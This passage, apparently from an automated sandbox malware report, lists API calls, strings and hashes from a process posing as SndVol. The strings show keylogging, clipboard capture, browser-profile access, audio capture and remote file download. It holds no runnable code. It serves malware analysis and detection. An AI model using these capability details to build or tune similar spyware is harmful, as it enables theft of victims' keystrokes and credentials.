                                                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                                                  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEnumInfoOpenQuerysend
                                                                • String ID: NG
                                                                • API String ID: 3114080316-1651712548
                                                                • Opcode ID: 55ca8a6ff5107e98a46d62fa6c82dcb4c28fc8089ef9bab0e30cdada37d9f8c1
                                                                • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                                • Opcode Fuzzy Hash: 55ca8a6ff5107e98a46d62fa6c82dcb4c28fc8089ef9bab0e30cdada37d9f8c1
                                                                • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                                                  • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                                Strings
                                                                • /sort "Visit Time" /stext ", xrefs: 004040B2
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                • String ID: /sort "Visit Time" /stext "
                                                                • API String ID: 368326130-1573945896
                                                                • Opcode ID: cda9f1322c07ff16e58388fd2a5f9a53186e38ad3625f603a3d8b01aa45fd49b
                                                                • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                                • Opcode Fuzzy Hash: cda9f1322c07ff16e58388fd2a5f9a53186e38ad3625f603a3d8b01aa45fd49b
                                                                • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                                APIs
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                                                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                                                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                • String ID: image/jpeg
                                                                • API String ID: 1291196975-3785015651
                                                                • Opcode ID: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                                • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                                                                • Opcode Fuzzy Hash: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                                                                • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                                                                APIs
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 0536978B
                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 053697D8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateStream
                                                                • String ID: image/jpeg
                                                                • API String ID: 1369699375-3785015651
                                                                • Opcode ID: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                                                • Instruction ID: 845036e86e335e7a793c75b9582f3108fca219c1765c1a28bda21e98e62b3469
                                                                • Opcode Fuzzy Hash: 8883413a241ecd6daa78ef1183ec8e175d09e4f7b2134cb7e7ff04ec22b53db4
                                                                • Instruction Fuzzy Hash: 5E314F72604304AFC301EF64CC88D7FB7E9EF8A715F004A1DF98697251DB7599058BA2
                                                                APIs
                                                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                • __Init_thread_footer.LIBCMT ref: 0040B797
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Init_thread_footer__onexit
                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                • API String ID: 1881088180-3686566968
                                                                • Opcode ID: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                                                                • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                                                • Opcode Fuzzy Hash: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                                                                • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                                                APIs
                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ACP$OCP
                                                                • API String ID: 0-711371036
                                                                • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                                                • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                                                • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 004162F5
                                                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen$CloseCreateValue
                                                                • String ID: !D@$okmode
                                                                • API String ID: 3411444782-1942679189
                                                                • Opcode ID: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                                • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                                • Opcode Fuzzy Hash: 33627434b7f82304c1ded9d3bb7774abf103e710ec097a6938a3706c33e36768
                                                                • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                                APIs
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                                                                  • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                                                                  • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                                  • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                • String ID: image/png
                                                                • API String ID: 1291196975-2966254431
                                                                • Opcode ID: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                                • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                                • Opcode Fuzzy Hash: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                                • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 481472006-1507639952
                                                                • Opcode ID: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                                                                • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                                • Opcode Fuzzy Hash: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                                                                • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                                APIs
                                                                • Sleep.KERNEL32 ref: 00416640
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadFileSleep
                                                                • String ID: !D@
                                                                • API String ID: 1931167962-604454484
                                                                • Opcode ID: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
                                                                • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                                • Opcode Fuzzy Hash: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
                                                                • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime
                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                • API String ID: 481472006-2430845779
                                                                • Opcode ID: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                                • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                                • Opcode Fuzzy Hash: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                                                                • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Event
                                                                • String ID: !D@$NG
                                                                • API String ID: 4201588131-2721294649
                                                                • Opcode ID: e4d71aff3f2fe3f8721a960ccbb7594573a45445a8ec9114e4e6326f33baa27e
                                                                • Instruction ID: 1cf8482b916525c303e52ed2259d98815fe283d93164774096b0e9dfdcfd8277
                                                                • Opcode Fuzzy Hash: e4d71aff3f2fe3f8721a960ccbb7594573a45445a8ec9114e4e6326f33baa27e
                                                                • Instruction Fuzzy Hash: C711A7766042449BD624FB74DC44EEF73E8AB95330F40496DEDA993190EF306A08C7A6
                                                                APIs
                                                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                                • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                • String ID: Online Keylogger Stopped
                                                                • API String ID: 1623830855-1496645233
                                                                • Opcode ID: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                                                                • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                                • Opcode Fuzzy Hash: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                                                                • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                APIs
                                                                • waveInPrepareHeader.WINMM(00474D94,00000020,00476BD4,00476BD4,00476B50,00474EE0,?,00000000,053526E2), ref: 05352516
                                                                • waveInAddBuffer.WINMM(00474D94,00000020,?,00000000,053526E2), ref: 0535252C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$BufferHeaderPrepare
                                                                • String ID: XMG
                                                                • API String ID: 2315374483-813777761
                                                                • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                • Instruction ID: cd2f692fb01916245e9ccd5f0dab926871f51705bf79bea8f77a2af5e03d22da
                                                                • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                • Instruction Fuzzy Hash: 7B0181B5700301AFD7109F64EC48E66BBE9FB892117014139F909C3761EB71AC91CFA4
                                                                APIs
                                                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,0535570D), ref: 0536D7D6
                                                                • LocalFree.KERNEL32(?,?), ref: 0536D7FC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FormatFreeLocalMessage
                                                                • String ID: PkGNG
                                                                • API String ID: 1427518018-263838557
                                                                • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                                                • Instruction ID: 2c08f987b682d95a4102c40cd8c4210e62c8789c1d00e88102785c0d35132850
                                                                • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                                                • Instruction Fuzzy Hash: C3F0C275B0020DBB9F18ABA5EC4DDFFB77DDF84221B10402AB916E2090EE606D058665
                                                                APIs
                                                                • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LocaleValid
                                                                • String ID: IsValidLocaleName$JD
                                                                • API String ID: 1901932003-2234456777
                                                                • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: $G
                                                                • API String ID: 269201875-4251033865
                                                                • Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                                                • Instruction ID: a1786cca121f65442f305e3145198b3cbbe44e7f2711a6d67cb2c5ab942c8739
                                                                • Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                                                • Instruction Fuzzy Hash: D9E0E5E2B0551050AF7DB23A6D0CB6B054ABBC2674F105226E528CA2C0EFA084539165
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                • API String ID: 1174141254-4188645398
                                                                • Opcode ID: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
                                                                • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                • Opcode Fuzzy Hash: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
                                                                • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                • API String ID: 1174141254-2800177040
                                                                • Opcode ID: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
                                                                • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                • Opcode Fuzzy Hash: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
                                                                • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                APIs
                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                • API String ID: 1174141254-1629609700
                                                                • Opcode ID: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
                                                                • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                • Opcode Fuzzy Hash: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
                                                                • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: $G
                                                                • API String ID: 269201875-4251033865
                                                                • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                • Instruction ID: 5ca5939436eba3647927c4f95562925acbd93ca2c5a660fb48ff861803352643
                                                                • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                • Instruction Fuzzy Hash: EEE02BD3B1152100EFBDA2393D0C77A058ABBC2335F219326E534C71D0EFA444538065
                                                                APIs
                                                                • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                                  • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                                Strings
                                                                Memory Dump Source
